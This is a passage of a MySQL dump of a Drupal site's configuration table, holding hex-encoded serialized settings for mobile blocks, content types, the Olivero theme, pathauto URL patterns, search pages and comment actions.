745f31333863336133352d626232642d343163392d393066322d633431306331653439653261223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f38626565383432332d323332652d346534622d383336632d323661616565643562376331223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f38626565383432332d323332652d346534622d383336632d323661616565643562376331223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f36366266653230302d363734612d343931302d386332322d393939636139343531316139223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f36366266653230302d363734612d343931302d386332322d393939636139343531316139223b693a303b733a36313a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f6163636f756e74223b693a303b733a36313a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f6163636f756e74223b693a303b733a35373a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6272616e64696e675f626c6f636b223b693a303b733a35373a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6272616e64696e675f626c6f636b223b693a303b733a35393a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f62726561646372756d625f626c6f636b223b693a303b733a35393a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f62726561646372756d625f626c6f636b223b693a303b733a35333a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d61696e5f626c6f636b223b693a303b733a35333a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d61696e5f626c6f636b223b693a303b733a36303a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f666f6f746572223b693a303b733a36303a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f666f6f746572223b693a303b733a34363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f68656c705f626c6f636b223b693a303b733a34363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f68656c705f626c6f636b223b693a303b733a35353a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f6c6f63616c5f616374696f6e735f626c6f636b223b693a303b733a35353a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f6c6f63616c5f616374696f6e735f626c6f636b223b693a303b733a35333a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f6c6f63616c5f7461736b735f626c6f636b223b693a303b733a35333a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f6c6f63616c5f7461736b735f626c6f636b223b693a303b733a35323a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f757365725f6c6f67696e5f626c6f636b223b693a303b733a35323a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f757365725f6c6f67696e5f626c6f636b223b693a303b733a35383a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f6d61696e223b693a303b733a35383a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f6d61696e223b693a303b733a35373a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d657373616765735f626c6f636b223b693a303b733a35373a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d657373616765735f626c6f636b223b693a303b733a35323a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f706167655f7469746c655f626c6f636b223b693a303b733a35323a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f706167655f7469746c655f626c6f636b223b693a303b733a35333a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f7365617263685f666f726d5f626c6f636b223b693a303b733a35333a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f7365617263685f666f726d5f626c6f636b223b693a303b733a35393a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f746f6f6c73223b693a303b733a35393a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f73797374656d5f6d656e755f626c6f636b5f746f6f6c73223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f38663266383436352d663139362d343433612d613865372d623738393963633531353230223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f62333031373461632d326334642d346166302d383335612d633633633737313936663035223b693a303b733a36343a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f61637469766974792d626c6f636b5f31223b693a303b733a36343a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f61637469766974792d626c6f636b5f31223b693a303b733a36383a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f616e6e6f756e63656d656e742d626c6f636b5f31223b693a303b733a36383a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f616e6e6f756e63656d656e742d626c6f636b5f31223b693a303b733a37303a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a37303a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f31223b693a303b733a37303a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a37303a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f72656c617465645f626c6f636b732d626c6f636b5f32223b693a303b733a36323a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a36323a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f76696577735f626c6f636b5f736c696465722d626c6f636b5f31223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f30373633373339352d353338392d343263382d613235632d353436393734373138376664223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f73686f775f62706d6f62696c655f626c6f636b5f636f6e74656e745f65636436343163332d383266312d343936392d383162302d316166656634376465316331223b693a303b733a38363a2273657474696e67735f6d6f62696c655f626c6f636b5f686964655f62706d6f62696c655f626c6f636b5f636f6e74656e745f65636436343163332d383266312d343936392d383162302d316166656634376465316331223b693a303b733a33303a2273657474696e67735f73686f775f706167655f73756767657374696f6e73223b693a303b733a32353a2273657474696e67735f73686f775f77696e646f775f73697a65223b693a303b733a32373a2273657474696e67735f656e61626c655f6c6976655f72656c6f6164223b693a303b733a32353a2273657474696e67735f6c6976655f72656c6f61645f706f7274223b733a353a223335373239223b733a32313a2273657474696e67735f6e756b655f746f6f6c626172223b693a303b733a33323a2273657474696e67735f6d61785f77696474685f76616c75655f666f6f74657273223b733a323a223930223b733a33313a2273657474696e67735f6d61785f77696474685f756e69745f666f6f74657273223b733a323a22656d223b7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('', 'node.settings', 0x613a323a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2257306367465068504a33674164716d30362d617a3438424c66354d56636f5a565330486442796f6f666930223b7d733a31353a227573655f61646d696e5f7468656d65223b623a313b7d),
('', 'node.type.activities', 0x613a31323a7b733a343a2275756964223b733a33363a2233356330303033632d313665322d343663352d393461662d326634393236323864396137223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a226d656e755f7569223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a373a226d656e755f7569223b613a323a7b733a31353a22617661696c61626c655f6d656e7573223b613a303a7b7d733a363a22706172656e74223b733a303a22223b7d7d733a343a226e616d65223b733a31303a2261637469766974696573223b733a343a2274797065223b733a31303a2261637469766974696573223b733a31313a226465736372697074696f6e223b4e3b733a343a2268656c70223b4e3b733a31323a226e65775f7265766973696f6e223b623a313b733a31323a22707265766965775f6d6f6465223b693a313b733a31373a22646973706c61795f7375626d6974746564223b623a303b7d),
('', 'node.type.announcement', 0x613a31323a7b733a343a2275756964223b733a33363a2264623535306534662d643239372d343432392d613030642d653264393461653631656137223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a226d656e755f7569223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a373a226d656e755f7569223b613a323a7b733a31353a22617661696c61626c655f6d656e7573223b613a303a7b7d733a363a22706172656e74223b733a303a22223b7d7d733a343a226e616d65223b733a31323a22616e6e6f756e63656d656e74223b733a343a2274797065223b733a31323a22616e6e6f756e63656d656e74223b733a31313a226465736372697074696f6e223b4e3b733a343a2268656c70223b4e3b733a31323a226e65775f7265766973696f6e223b623a313b733a31323a22707265766965775f6d6f6465223b693a313b733a31373a22646973706c61795f7375626d6974746564223b623a303b7d),
('', 'node.type.article', 0x613a31323a7b733a343a2275756964223b733a33363a2235346166613939372d373865632d343038352d613236322d653566326261396335336439223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22416557315345446762314f54514143415747687a764d6b6e4d59414a6c635a75306a6c6a666555336f736f223b7d733a343a226e616d65223b733a373a2241727469636c65223b733a343a2274797065223b733a373a2261727469636c65223b733a31313a226465736372697074696f6e223b733a38393a22557365203c656d3e61727469636c65733c2f656d3e20666f722074696d652d73656e73697469766520636f6e74656e74206c696b65206e6577732c2070726573732072656c6561736573206f7220626c6f6720706f7374732e223b733a343a2268656c70223b4e3b733a31323a226e65775f7265766973696f6e223b623a313b733a31323a22707265766965775f6d6f6465223b693a313b733a31373a22646973706c61795f7375626d6974746564223b623a313b7d),
('', 'node.type.language_center', 0x613a31323a7b733a343a2275756964223b733a33363a2263363663646337622d373730632d343630612d393633662d613432323437613132393932223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a226d656e755f7569223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a373a226d656e755f7569223b613a323a7b733a31353a22617661696c61626c655f6d656e7573223b613a303a7b7d733a363a22706172656e74223b733a303a22223b7d7d733a343a226e616d65223b733a31353a226c616e67756167652d63656e746572223b733a343a2274797065223b733a31353a226c616e67756167655f63656e746572223b733a31313a226465736372697074696f6e223b4e3b733a343a2268656c70223b4e3b733a31323a226e65775f7265766973696f6e223b623a313b733a31323a22707265766965775f6d6f6465223b693a313b733a31373a22646973706c61795f7375626d6974746564223b623a303b7d),
('', 'node.type.page', 0x613a31323a7b733a343a2275756964223b733a33363a2238386239616461652d393762662d346335392d383665652d376237383939616530353963223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a224b757941344e485058636d4b416a5274776130765163325a637972554a7936496c53325441794d4e526263223b7d733a343a226e616d65223b733a31303a2242617369632070616765223b733a343a2274797065223b733a343a2270616765223b733a31313a226465736372697074696f6e223b733a37373a22557365203c656d3e62617369632070616765733c2f656d3e20666f7220796f75722073746174696320636f6e74656e742c207375636820617320616e202741626f75742075732720706167652e223b733a343a2268656c70223b4e3b733a31323a226e65775f7265766973696f6e223b623a313b733a31323a22707265766965775f6d6f6465223b693a313b733a31373a22646973706c61795f7375626d6974746564223b623a303b7d),
('', 'node.type.slider', 0x613a31323a7b733a343a2275756964223b733a33363a2238613435323538612d353864382d346536632d386665372d303434653839313336356337223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a226d656e755f7569223b7d7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a373a226d656e755f7569223b613a323a7b733a31353a22617661696c61626c655f6d656e7573223b613a313a7b693a303b733a343a226d61696e223b7d733a363a22706172656e74223b733a353a226d61696e3a223b7d7d733a343a226e616d65223b733a363a22736c69646572223b733a343a2274797065223b733a363a22736c69646572223b733a31313a226465736372697074696f6e223b4e3b733a343a2268656c70223b4e3b733a31323a226e65775f7265766973696f6e223b623a313b733a31323a22707265766965775f6d6f6465223b693a313b733a31373a22646973706c61795f7375626d6974746564223b623a303b7d),
('', 'olivero.settings', 0x613a383a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22596c6f6870367364724c31645534762d4b63587a5854502d553842414d6768344e574a4139654748744f34223b7d733a373a2266617669636f6e223b613a313a7b733a31313a227573655f64656661756c74223b623a313b7d733a383a226665617475726573223b613a343a7b733a32303a22636f6d6d656e745f757365725f70696374757265223b623a313b733a32353a22636f6d6d656e745f757365725f766572696669636174696f6e223b623a313b733a373a2266617669636f6e223b623a313b733a31373a226e6f64655f757365725f70696374757265223b623a303b7d733a343a226c6f676f223b613a313a7b733a31313a227573655f64656661756c74223b623a303b7d733a32303a2274686972645f70617274795f73657474696e6773223b613a313a7b733a383a2273686f7274637574223b613a313a7b733a31313a226d6f64756c655f6c696e6b223b623a313b7d7d733a32323a226d6f62696c655f6d656e755f616c6c5f776964746873223b693a303b733a32323a22736974655f6272616e64696e675f62675f636f6c6f72223b733a373a2264656661756c74223b733a31383a22626173655f7072696d6172795f636f6c6f72223b733a373a2223316239616534223b7d),
('', 'pathauto.pattern.activities_node_title_', 0x613a31323a7b733a343a2275756964223b733a33363a2235326466646234652d373932392d343935622d616261372d383232336463336530323566223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32303a226e6f64652e747970652e61637469766974696573223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a323a226964223b733a32323a22616374697669746965735f6e6f64655f7469746c655f223b733a353a226c6162656c223b733a32333a22616374697669746965732f5b6e6f64653a7469746c655d223b733a343a2274797065223b733a32333a2263616e6f6e6963616c5f656e7469746965733a6e6f6465223b733a373a227061747465726e223b733a32343a222f616374697669746965732f5b6e6f64653a7469746c655d223b733a31383a2273656c656374696f6e5f6372697465726961223b613a313a7b733a33363a2266656434363435612d663530632d346130352d613636662d313762376561306630366566223b613a343a7b733a323a226964223b733a31383a22656e746974795f62756e646c653a6e6f6465223b733a363a226e6567617465223b623a303b733a31353a22636f6e746578745f6d617070696e67223b613a313a7b733a343a226e6f6465223b733a343a226e6f6465223b7d733a373a2262756e646c6573223b613a313a7b733a31303a2261637469766974696573223b733a31303a2261637469766974696573223b7d7d7d733a31353a2273656c656374696f6e5f6c6f676963223b733a333a22616e64223b733a363a22776569676874223b693a2d353b733a31333a2272656c6174696f6e7368697073223b613a303a7b7d7d),
('', 'pathauto.pattern.announcement_node_title_', 0x613a31323a7b733a343a2275756964223b733a33363a2231643039646339622d386462612d343566362d623632372d353266323439346161623530223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a323a226964223b733a32343a22616e6e6f756e63656d656e745f6e6f64655f7469746c655f223b733a353a226c6162656c223b733a32353a22616e6e6f756e63656d656e742f5b6e6f64653a7469746c655d223b733a343a2274797065223b733a32333a2263616e6f6e6963616c5f656e7469746965733a6e6f6465223b733a373a227061747465726e223b733a32363a222f616e6e6f756e63656d656e742f5b6e6f64653a7469746c655d223b733a31383a2273656c656374696f6e5f6372697465726961223b613a313a7b733a33363a2238323536613465652d663963332d343237622d616634352d383061666539636166663832223b613a343a7b733a323a226964223b733a31383a22656e746974795f62756e646c653a6e6f6465223b733a363a226e6567617465223b623a303b733a31353a22636f6e746578745f6d617070696e67223b613a313a7b733a343a226e6f6465223b733a343a226e6f6465223b7d733a373a2262756e646c6573223b613a313a7b733a31323a22616e6e6f756e63656d656e74223b733a31323a22616e6e6f756e63656d656e74223b7d7d7d733a31353a2273656c656374696f6e5f6c6f676963223b733a333a22616e64223b733a363a22776569676874223b693a2d353b733a31333a2272656c6174696f6e7368697073223b613a303a7b7d7d),
('', 'pathauto.pattern.content_node_title_', 0x613a31323a7b733a343a2275756964223b733a33363a2264366562653632352d383434322d343239352d396164342d643636623439316463663130223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31343a226e6f64652e747970652e70616765223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a323a226964223b733a31393a22636f6e74656e745f6e6f64655f7469746c655f223b733a353a226c6162656c223b733a32303a22636f6e74656e742f5b6e6f64653a7469746c655d223b733a343a2274797065223b733a32333a2263616e6f6e6963616c5f656e7469746965733a6e6f6465223b733a373a227061747465726e223b733a32313a222f636f6e74656e742f5b6e6f64653a7469746c655d223b733a31383a2273656c656374696f6e5f6372697465726961223b613a313a7b733a33363a2235383330323864652d353637312d346531612d626239652d323338373965663135623661223b613a343a7b733a323a226964223b733a31383a22656e746974795f62756e646c653a6e6f6465223b733a363a226e6567617465223b623a303b733a31353a22636f6e746578745f6d617070696e67223b613a313a7b733a343a226e6f6465223b733a343a226e6f6465223b7d733a373a2262756e646c6573223b613a313a7b733a343a2270616765223b733a343a2270616765223b7d7d7d733a31353a2273656c656374696f6e5f6c6f676963223b733a333a22616e64223b733a363a22776569676874223b693a2d353b733a31333a2272656c6174696f6e7368697073223b613a303a7b7d7d),
('', 'pathauto.pattern.language_center_node_title', 0x613a31323a7b733a343a2275756964223b733a33363a2239356634653535322d333036312d343363382d393333642d396433333139646632333965223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32353a226e6f64652e747970652e6c616e67756167655f63656e746572223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a323a226964223b733a32363a226c616e67756167655f63656e7465725f6e6f64655f7469746c65223b733a353a226c6162656c223b733a32383a226c616e67756167652d63656e7465722f5b6e6f64653a7469746c655d223b733a343a2274797065223b733a32333a2263616e6f6e6963616c5f656e7469746965733a6e6f6465223b733a373a227061747465726e223b733a32393a222f6c616e67756167652d63656e7465722f5b6e6f64653a7469746c655d223b733a31383a2273656c656374696f6e5f6372697465726961223b613a313a7b733a33363a2261663230353130342d633132372d343932332d393363642d396336396138613165303832223b613a343a7b733a323a226964223b733a31383a22656e746974795f62756e646c653a6e6f6465223b733a363a226e6567617465223b623a303b733a31353a22636f6e746578745f6d617070696e67223b613a313a7b733a343a226e6f6465223b733a343a226e6f6465223b7d733a373a2262756e646c6573223b613a313a7b733a31353a226c616e67756167655f63656e746572223b733a31353a226c616e67756167655f63656e746572223b7d7d7d733a31353a2273656c656374696f6e5f6c6f676963223b733a333a22616e64223b733a363a22776569676874223b693a2d353b733a31333a2272656c6174696f6e7368697073223b613a303a7b7d7d),
('', 'pathauto.settings', 0x613a31333a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225377764c7038736e795045457846343143614a4a59645055566f6d6f664c71745876776369486334635067223b7d733a32303a22656e61626c65645f656e746974795f7479706573223b613a313a7b693a303b733a343a2275736572223b7d733a31313a2270756e6374756174696f6e223b613a313a7b733a363a2268797068656e223b693a313b7d733a373a22766572626f7365223b623a303b733a393a22736570617261746f72223b733a313a222d223b733a31303a226d61785f6c656e677468223b693a3130303b733a32303a226d61785f636f6d706f6e656e745f6c656e677468223b693a3130303b733a31333a227472616e736c69746572617465223b623a313b733a31323a227265647563655f6173636969223b623a303b733a343a2263617365223b623a313b733a31323a2269676e6f72655f776f726473223b733a3133343a22612c20616e2c2061732c2061742c206265666f72652c206275742c2062792c20666f722c2066726f6d2c2069732c20696e2c20696e746f2c206c696b652c206f662c206f66662c206f6e2c206f6e746f2c207065722c2073696e63652c207468616e2c207468652c20746869732c20746861742c20746f2c2075702c207669612c2077697468223b733a31333a227570646174655f616374696f6e223b693a323b733a31313a22736166655f746f6b656e73223b613a363a7b693a303b733a353a22616c696173223b693a313b733a343a2270617468223b693a323b733a393a226a6f696e2d70617468223b693a333b733a393a226c6f67696e2d75726c223b693a343b733a333a2275726c223b693a353b733a393a2275726c2d6272696566223b7d7d),
('', 'search.page.help_search', 0x613a393a7b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2268656c70223b7d7d733a323a226964223b733a31313a2268656c705f736561726368223b733a353a226c6162656c223b733a343a2248656c70223b733a343a2270617468223b733a343a2268656c70223b733a363a22776569676874223b693a303b733a363a22706c7567696e223b733a31313a2268656c705f736561726368223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'search.page.node_search', 0x613a31313a7b733a343a2275756964223b733a33363a2232383230626237622d376434342d346561312d626561312d666166653634643730396430223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a226e6f6465223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2239377476747a474f61385f666c623232437a536a67746d5f596b69474d487645424f2d3671324b39565f55223b7d733a323a226964223b733a31313a226e6f64655f736561726368223b733a353a226c6162656c223b733a373a22436f6e74656e74223b733a343a2270617468223b733a343a226e6f6465223b733a363a22776569676874223b693a2d31303b733a363a22706c7567696e223b733a31313a226e6f64655f736561726368223b733a31333a22636f6e66696775726174696f6e223b613a313a7b733a383a2272616e6b696e6773223b613a303a7b7d7d7d),
('', 'search.page.user_search', 0x613a31313a7b733a343a2275756964223b733a33363a2237633135653334362d393736392d343161652d613632392d306166613134323732323230223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a343a2275736572223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226b336155615a58474475686b656b32545a496565305041704f505476595a4c61647a69656b647948413541223b7d733a323a226964223b733a31313a22757365725f736561726368223b733a353a226c6162656c223b733a353a225573657273223b733a343a2270617468223b733a343a2275736572223b733a363a22776569676874223b693a303b733a363a22706c7567696e223b733a31313a22757365725f736561726368223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'search.settings', 0x613a353a7b733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22687656784c31472d5a437861713332495a77733059736675687661446951455f6e702d306733354b6a556b223b7d733a31323a22616e645f6f725f6c696d6974223b693a373b733a31323a2264656661756c745f70616765223b733a31313a226e6f64655f736561726368223b733a353a22696e646578223b613a343a7b733a31303a2263726f6e5f6c696d6974223b693a3130303b733a31313a226f7665726c61705f636a6b223b623a313b733a31373a226d696e696d756d5f776f72645f73697a65223b693a333b733a31313a227461675f77656967687473223b613a31323a7b733a323a226831223b693a32353b733a323a226832223b693a31383b733a323a226833223b693a31353b733a323a226834223b693a31343b733a323a226835223b693a393b733a323a226836223b693a363b733a313a2275223b693a333b733a313a2262223b693a333b733a313a2269223b693a333b733a363a227374726f6e67223b693a333b733a323a22656d223b693a333b733a313a2261223b693a31303b7d7d733a373a226c6f6767696e67223b623a303b7d),
('', 'shortcut.set.default', 0x613a373a7b733a343a2275756964223b733a33363a2231356364316633642d333564632d343065622d623865642d666363333234633361653731223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a303a7b7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a225535566c476a645f53665630516d5f45666e61796e4f6663353439634e736346417834384a66596f4d5249223b7d733a323a226964223b733a373a2264656661756c74223b733a353a226c6162656c223b733a31353a22e38387e38395e382a9e383abe38388223b7d),
('', 'system.action.comment_delete_action', 0x613a31303a7b733a343a2275756964223b733a33363a2261366537326361662d653131642d346230302d383861362d656437313330313937346261223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2276704248384f6d4c34736465734364655a4c7357384b4f75744235676b627265574a62666a6866464b6151223b7d733a323a226964223b733a32313a22636f6d6d656e745f64656c6574655f616374696f6e223b733a353a226c6162656c223b733a31343a2244656c65746520636f6d6d656e74223b733a343a2274797065223b733a373a22636f6d6d656e74223b733a363a22706c7567696e223b733a32383a22656e746974793a64656c6574655f616374696f6e3a636f6d6d656e74223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.comment_publish_action', 0x613a31303a7b733a343a2275756964223b733a33363a2238313634396537372d626434622d343138652d623239312d383063643166393037366239223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2243303064794c5f575f354d306e466c675542336c575554557339366a6e35314a77314d4c485645485a4430223b7d733a323a226964223b733a32323a22636f6d6d656e745f7075626c6973685f616374696f6e223b733a353a226c6162656c223b733a31353a225075626c69736820636f6d6d656e74223b733a343a2274797065223b733a373a22636f6d6d656e74223b733a363a22706c7567696e223b733a32393a22656e746974793a7075626c6973685f616374696f6e3a636f6d6d656e74223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
('', 'system.action.comment_save_action', 0x613a31303a7b733a343a2275756964223b733a33363a2232323566386335322d363561322d343431652d616639302d373861613731313135373430223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a313a7b693a303b733a373a22636f6d6d656e74223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a226c6679455f736e6d7666675f455133564479685574474158676d7174456971613436493362544d67384455223b7d733a323a226964223b733a31393a22636f6d6d656e745f736176655f616374696f6e223b733a353a226c6162656c223b733a31323a225361766520636f6d6d656e74223b733a343a2274797065223b733a373a22636f6d6d656e74223b733a363a22706c7567696e223b733a32363a22656e746974793a736176655f616374696f6e3a636f6d6d656e74223b733a31333a22636f6e66696775726174696f6e223b613a303a7b7d7d),
